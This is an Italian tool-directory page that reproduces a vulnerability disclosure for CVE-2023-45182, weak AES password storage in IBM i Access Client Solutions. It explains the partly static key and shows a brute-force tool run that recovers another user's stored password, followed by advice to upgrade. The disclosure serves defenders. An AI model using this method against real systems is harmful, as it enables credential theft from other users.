Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-45182 — IBM i Access Client Solutions < 1.1.9.4 - Crittografia debole delle password | Kitploit
Strumenti/GitHubGitHub/afine-com/cve-2023-45182
Password CrackingStrumenti di Crittografia/DecrittografiaAnalisi delle VulnerabilitàExploitCrittografia
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Crittografia debole delle password

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Criptazione debole delle password

Cronologia

  • Vulnerabilità segnalata al venditore: 22.09.2023
  • Nuova versione corretta 1.1.9.4 rilasciata: 08.12.2023
  • Divulgazione pubblica: 15.12.2023

Descrizione

IBM i Access Client Solutions per memorizzare le password degli utenti utilizza l'algoritmo AES, tuttavia la chiave di crittografia di 16 byte è la combinazione di una stringa statica (Thanatos) e di caratteri casuali da una stringa che consiste di un'altra stringa statica (Behemoth) combinata con il nome utente, la home folder dell'utente, il sistema operativo (ad esempio Linux) combinato con la directory corrente in cui l'applicazione è stata avviata. Di conseguenza metà della chiave di crittografia è statica (stringa Thanatos) mentre la seconda metà è molto limitata. Ciò rende molto facile per un attaccante forzare la password anche su un singolo core della CPU.

Ecco un esempio di decifratura della password dell'utente mmajchrowicz utilizzando lo script as400_password_bruteforce_tool.java dall'account mkubiak:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

Questo problema è stato causato dall'applicazione di una crittografia debole delle password. Questo problema è stato risolto in IBM i Access Client Solutions 1.1.9.4.

Versioni interessate

< 1.1.9.4

Avviso

Aggiornare IBM i Access Client Solutions alla versione 1.1.9.4 o successiva.

Riferimenti

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
Scarica lo strumento